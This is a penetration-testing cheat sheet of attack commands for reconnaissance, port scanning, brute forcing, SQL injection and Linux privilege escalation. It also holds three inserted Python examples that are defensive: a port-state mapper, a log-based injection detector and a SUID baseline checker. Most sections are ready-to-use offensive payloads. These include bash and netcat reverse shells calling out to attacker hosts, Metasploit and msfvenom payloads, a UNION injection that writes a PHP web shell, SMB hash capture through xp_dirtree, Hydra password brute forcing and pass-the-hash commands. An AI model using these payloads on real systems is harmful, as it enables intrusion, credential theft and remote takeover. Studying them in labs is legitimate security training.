Reconnaissance

Passive: social media, company website, publicly available resources, job openings.
Tools: Netcraft, Archive.org, Shodan, Metagoofil, Maltego, recon-ng, Pipl, Thearchive.org, Sublist3r

Active: interacting with the victim, for example by becoming a Facebook friend.
Extract domains from index.html
wget invid.se
cat index.html | grep "href" | cut -d"/" -f3 | grep "site\.se" | cut -d'"' -f1 | sort -u > site.txt

Other site-copy tools: Web Data Extractor (Windows), httrack (Linux).

Enumeration / Scanning

Banner grabbing: whatweb host.se

Netdiscover
Passive mode: netdiscover -i eth0 -p
Active mode: netdiscover -i eth0 -r 192.168.8.0/24 -f
Nmap port states (text from the Nmap reference guide)

open: An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network.

closed: A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. Closed ports can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall; they would then appear in the filtered state, discussed next.

filtered: Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times in case the probe was dropped due to network congestion rather than filtering, which slows down the scan dramatically.

unfiltered: The port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan may help resolve whether the port is open.

open|filtered: Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited, so Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.

closed|filtered: Used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
Nmap examples
nmap -p 80 --script=http-enum www.certifiedhacker.com
nmap -p- -Pn -sS -sV -A 10.10.10.1
nmap -p- -Pn -sU -sS -sV -A 10.10.10.1
nmap -sC -sV -oA nmap/initial 10.10.10.1
nmap -p 445 --script safe -Pn -n 10.10.10.1
nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.1

Nmap scripts
--script=vuln             all default vulnerability scripts
--script=http-enum        HTTP enumeration, banner grabbing and so on
--script=http-shellshock  Shellshock detection
--script=smb-brute        SMB brute force
List the default and version scripts that touch SMB:
locate -r '\.nse$' | xargs grep categories | grep 'default\|version' | grep smb

Nmap options
-n        disable DNS resolution
-sC       default scripts
-sn       ping sweep
-sT       connect scan (full three-way handshake)
-sS       stealth half-open scan: SYN -> SYN/ACK -> RST
-sX       Xmas scan (FIN/URG/PSH); no response means the port is open (Linux machines)
-sN       Null scan, a TCP packet with no flags set; no response means the port is open (Linux machines)
-sV       version detection
-sU       UDP scan
-p- -A    all ports and aggressive
-sU -p 162  SNMP (162 is the trap port; the agent listens on 161)

Nmap combos
-sS -sV        stealth and version
-sI            idle scan via a zombie host (useful for IDS evasion)
-sS -O         operating system detection
-sn -f         ping sweep with fragmentation
-p 80 -A -T3   aggressive scan of port 80 with timing template T3 (T0 slowest to T5 fastest)
-sS -D RND:10  ten random decoys
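The port states above and the -sX/-sN notes follow fixed rules about what each probe response means. Added example, not from the original notes: the mapping Nmap applies per scan type, plus a helper that combines several scan types on one port the way the states text suggests for resolving "unfiltered". The response labels are my own constructed vocabulary.

```python
"""Turn a probe response into the Nmap port state for a given scan type, and
intersect several scan types' verdicts on one port. Response labels below are
constructed for this example."""

SYN_ACK, RST, NONE, UDP_REPLY = "syn/ack", "rst", "none", "udp"
ICMP_PORT_UNREACH = "icmp3/3"    # type 3 code 3: port unreachable
ICMP_ADMIN_PROHIB = "icmp3/13"   # type 3 code 13: administratively prohibited
STATE_ORDER = ("open", "closed", "filtered")

def port_state(scan: str, response: str) -> str:
    """scan is the Nmap flag without the dash: sS, sT, sF, sN, sX, sA or sU."""
    if scan in ("sS", "sT"):
        # anything other than SYN/ACK or RST (silence, ICMP unreachable) is filtered
        return {SYN_ACK: "open", RST: "closed"}.get(response, "filtered")
    if scan in ("sF", "sN", "sX"):
        # RFC 793 hosts answer RST from a closed port and stay silent on an open
        # one, so silence cannot be told apart from a filter that drops probes
        if response == RST:
            return "closed"
        return "open|filtered" if response == NONE else "filtered"
    if scan == "sA":
        # the ACK scan only learns whether a stateful filter is in the way
        return "unfiltered" if response == RST else "filtered"
    if scan == "sU":
        return {UDP_REPLY: "open", ICMP_PORT_UNREACH: "closed",
                NONE: "open|filtered"}.get(response, "filtered")
    raise ValueError(f"unknown scan type {scan}")

# Which real conditions each reported state still leaves possible.
CANDIDATES = {
    "open": {"open"}, "closed": {"closed"}, "filtered": {"filtered"},
    "unfiltered": {"open", "closed"},
    "open|filtered": {"open", "filtered"},
    "closed|filtered": {"closed", "filtered"},
}

def resolve(observations) -> str:
    """Intersect what several (scan, response) pairs say about one port.
    Returns the remaining state(s) joined with '|', or 'inconsistent'."""
    remaining = set(STATE_ORDER)
    for scan, response in observations:
        remaining &= CANDIDATES[port_state(scan, response)]
    if not remaining:
        return "inconsistent"   # e.g. a filter that treats scan types differently
    return "|".join(s for s in STATE_ORDER if s in remaining)
```

For example, an ACK scan reporting unfiltered combined with a FIN scan that gets no reply leaves only "open".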
UDP scan
UDP scans can give false positives if the host does not respond with ICMP.
nc -unvv -w 1 -z 10.0.2.15 160-165

Hping3 (<target> and <port> are placeholders)
Half-open SYN scan: hping3 -8 80 -S 1.2.3.4
Xmas tree scan:     hping3 -F -P -U <target> -p <port>
Null scan:          hping3 <target> -p <port>
FIN scan:           hping3 -F <target> -p <port>
ACK scan:           hping3 -A <target> -p <port>
UDP scan:           hping3 -2 <target> -p <port>
Ping sweep and port scan from the shell
Ping from the shell to find online hosts:
for ip in $(seq 1 254); do ping -c 1 172.20.40.$ip > /dev/null && echo "Online: 172.20.40.$ip"; done

Port scan from the shell without nmap (or download a static nmap build from GitHub):
for port in 22 25 80 443 445 8080 8443; do (echo Anything > /dev/tcp/172.20.40.201/$port && echo "open - $port") 2> /dev/null; done

Check whether a single port is open or closed with bash:
bash -c 'echo > /dev/tcp/172.20.20.188/1900 && echo open || echo false'
Gobuster
gobuster dir -k -u https://10.10.10.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Dirb
dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Curl
curl --url "imap://mail.example.com/" --user "bobby:tables"
Upload: curl --upload-file file.txt -v --url <url> --http1.0

Cewl
Collects words from web pages for use in password cracking; the output can then be fed to John the Ripper.
cewl http://www.site.se -m 6 -w /cewl.txt
Directory or path traversal
192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Null byte: ?page=../../../../../etc/passwd%00
Wpscan
wpscan --url http://10.1.1.1/ --enumerate t,u
wpscan --url http://10.1.1.1 -e -o tenten_wpscan.txt
wpscan --url <url>                                   scan the CMS
wpscan --url <url> --enumerate vp                    vulnerable plugins
wpscan --url <url> --enumerate t                     themes
wpscan --url <url> --enumerate u                     users
wpscan --url <url> --passwords pass.txt --max-threads 50   brute force
Windows tips
Run as: runas /netonly /user:domain.dc\svc_user cmd
Windows Credentials Editor (WCE): wce64.exe -w
SharpHound: SharpHound.exe -c all -d domain.dc --domaincontroller 10.10.1.1
Find files on Windows: where /R C:\ bash.exe
Getting access and maintaining access

Searchsploit, mirror an exploit down:
searchsploit -m exploits/php/webapps/18650.py

Metasploit basics
exploit -j         run the exploit as a background job
sessions -i <id>   interact with a session
sessions -l        list sessions
setg               set a global value, e.g. setg RHOST 192.168.1.1

Metasploit steps
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST <ip>
set LPORT <port>
exploit -j
Access the exploit (shell.aspx), then in the session:
shell
systeminfo
Search for suggested local exploits:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_015_kitrap0d
set lhost <ip>
set lport <port>

Create payloads with msfvenom (Linux)
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd --platform unix -e generic/none
Windows file transfer
TFTP server: atftpd -v --port 69 --bind-address 10.10.10.2 --daemon /srv/tftp/
TFTP client: tftp -i 192.168.1.1 GET nc.exe

FTP
On Windows this can be scripted with a text file: ftp -s:ftp.txt
ftp 192.168.1.1
ls
binary
get nc.exe
put nc.exe

Reverse shell with Netcat (use Ncat for SSL support and rules)
Listener:  nc -lvnp 4444
Connector: nc -nv 192.168.1.1 25

Netcat command execution
Victim: nc -lvnp 4444 -e /bin/bash
Source: nc -nv 10.0.2.15 4444
Netcat on Windows to get a PowerShell shell: nc64.exe 10.1.1.1 9001 -e powershell

Shell from dash or another bad shell
Attacker: nc -nlvp 9001
Victim: bash -c 'bash -i >& /dev/tcp/192.168.1.1/9001 0>&1'
Once you have the shell on the attacker side, upgrade it:
python -c 'import pty; pty.spawn("/bin/bash")'
script -q /dev/null
Then background it with Ctrl-Z, type stty raw -echo, and hit fg to bring it back to the foreground.

PHP reverse shell
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/
mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php
Nicer remote shell:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
If there is no real bash: Ctrl-Z to background, stty raw -echo, fg.
Password attacks

Responder
Set up Responder to listen for clients and capture hashes: responder

Capture NTLM hashes via SQL injection
Start an SMB server on the attacker: impacket-smbserver share $(pwd)
Use this in the injectable parameter on the web page: ; use master; exec xp_dirtree '\\10.1.1.1\share';--

Unshadow
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt

Hashcat
List the NTLM hash modes: hashcat -h | grep -i ntlm
Combination attack against MD5 password hashes: hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
Straight attack, very fast on simple passwords: hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt

John the Ripper
Show cracked NTLM hashes: john hashes.txt --format=nt --show
Use cewl.txt with John's rules to generate a password list: john --wordlist=cewl.txt --rules --stdout > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

RSA keys
Convert the RSA key to John format and save it in a file: ssh2john rsakey > rsa2johnfile
Crack the passphrase using any wordlist: john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH rsa2johnfile
When it is done, show the password if it has been cracked: john --show rsa2johnfile

Password dumps on Windows: pwdump and fgdump

Crunch, create password lists:
crunch 6 6 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing the hash (pth-* tools)
export SMBHASH=1231234124124124124:1243124124124124124124124
pth-winexe -U administrator% //192.168.1.1 cmd

Ncrack, RDP brute force: ncrack -v -f --user administrator -P password.txt rdp://192.168.1.1,CL=1

Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form "/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low"
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 54415 -I

MySQL, connect to a local database: mysql -u zabbix -D zabbixdb -p

Sqlmap
Use Burp Suite to capture the login request and save it to login.req: sqlmap -r login.req --level 5
Search for databases: sqlmap -u "http://192.168.1.1/index.php?par=" --dbs
Check the privileges of the database users: sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --privileges
Read a file from the web server: sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --file-read=/xampp/htdocs/index.php --batch
Dump usernames and passwords: sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --dump --threads=5
Manual UNION injection
Find the column count and which columns are echoed to the page:
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
Get the name of the SQL user:
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
Get the version:
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
Get all tables:
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
Get all columns of a specific table:
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
Get the contents of the users table, columns name and password (0x3a is a colon and only serves as a delimiter between name and password):
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 from users -- -
Read a file:
?id=1 union select 1,2,3,4,load_file('/etc/passwd'),6,7,8,9 -- -
?id=1 union select 1,2,3,4,load_file('/var/www/login.php'),6,7,8,9 -- -
Create a file, then read it back to check that it was really created:
?id=1 union select 1,2,3,4,'this is a test message',6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4,load_file('/var/www/test'),6,7,8,9 -- -
Create a file to get a shell:
?id=1 union select null,null,null,null,'<?php system($_GET["cmd"]) ?>',6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null,load_file('/var/www/shell.php'),6,7,8,9 -- -
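The traversal payloads (../ and %00) and the UNION/load_file/into outfile payloads above all end up verbatim in the web server's access log, which is where a defender finds them. Added example, not from the original notes, serving both sections: a small detector over combined-format access log lines. The log lines are constructed from the payloads above and the rule names are my own.

```python
"""Flag access-log requests carrying the traversal and UNION-injection payloads
shown in these notes. Sample log lines are constructed."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# (name, pattern) applied to the URL-decoded, lower-cased request target
RULES = [
    ("path_traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
    ("null_byte", re.compile("\x00")),
    ("union_select", re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b")),
    ("schema_probe", re.compile(r"information_schema\.(tables|columns)")),
    ("file_io", re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b")),
]

def decode(target: str) -> str:
    """Decode twice (catches %252e style double encoding), drop SQL inline
    comments used to split keywords, lower-case for matching."""
    text = unquote(unquote(target))
    return re.sub(r"/\*.*?\*/", " ", text).lower()

def classify(line: str):
    """Return (client_ip, [rules hit]) or None when the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status = m.groups()
    decoded = decode(target)
    return ip, [name for name, rx in RULES if rx.search(decoded)]

def suspicious(lines) -> dict:
    """Map client IP -> sorted rule names it triggered anywhere in the log."""
    out = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            out.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(rules) for ip, rules in out.items()}

# Constructed sample log, modelled on the payloads in these notes.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20union%20select%201,2,3,4,user(),6,7,8,9%20--%20- HTTP/1.1" 200 900',
    '10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20union/**/select%201,load_file(%27/etc/passwd%27)%20--%20- HTTP/1.1" 200 900',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1 HTTP/1.1" 200 400',
]
```

Running suspicious(SAMPLE_LOG) attributes traversal plus null byte to 10.0.0.5 and UNION plus file I/O to 10.0.0.6, while the plain request from 10.0.0.7 triggers nothing.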
Linux privilege escalation
The things I have used from this page are:

# Sticky bit: only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000): run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000): run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
# SGID or SUID (parentheses are needed, otherwise -type f only applies to the SUID branch)
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
# Looks in "common" places (/bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin) for SGID or SUID; quicker search
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
# Start at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

LinEnum
./LinEnum.sh -t > kali.txt

Commands
cat /etc/issue
cat /etc/lsb-release
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ps aux | grep root
crontab -l

Port forwarding
ssh -L 8080:127.0.0.1:80 [email protected]
ssh -R 8080:127.0.0.1:80 [email protected]
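The find commands above only make sense if you know what the 4000/2000/1000 bits mean and, on the defending side, whether a SUID binary is new. Added example, not from the original notes: a Python equivalent of those searches (same depth limit, symlinks skipped, unreadable entries ignored) with a baseline comparison so a freshly planted SUID file stands out. It assumes a Linux host; the baseline format is my own.

```python
"""Find SUID/SGID files and sticky directories like the find commands above, and
diff the result against a saved baseline. Assumes a Linux filesystem."""
import os
import stat

def special_bits(mode: int) -> list:
    """Name the special bits the notes describe: chmod 4000 (SUID, run as the
    file owner), 2000 (SGID, run as the group) on regular files, and 1000
    (sticky, restricts delete/rename) on directories."""
    names = []
    if stat.S_ISREG(mode):
        if mode & stat.S_ISUID:
            names.append("suid")
        if mode & stat.S_ISGID:
            names.append("sgid")
    elif stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        names.append("sticky")
    return names

def find_special(root: str, maxdepth: int = 3) -> dict:
    """Walk root up to maxdepth levels, skip symlinks and unreadable entries
    (the 2>/dev/null of the find commands), and return {path: bits}."""
    found = {}
    root = os.path.abspath(root)
    base = root.rstrip("/").count("/")
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath.rstrip("/").count("/") - base >= maxdepth - 1:
            dirnames[:] = []          # do not descend any further
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: never follow the link itself
            except OSError:
                continue              # permission denied, vanished, etc.
            if stat.S_ISLNK(st.st_mode):
                continue
            bits = special_bits(st.st_mode)
            if bits:
                found[path] = bits
    return found

def new_since_baseline(current: dict, baseline: dict) -> dict:
    """Entries absent from the baseline or whose special bits changed; a
    baseline is simply an earlier find_special() result saved to disk."""
    return {p: b for p, b in current.items() if baseline.get(p) != b}
```

Run find_special("/") once on a known-good host, keep the result, and later feed a fresh run to new_since_baseline to list anything that gained SUID/SGID since.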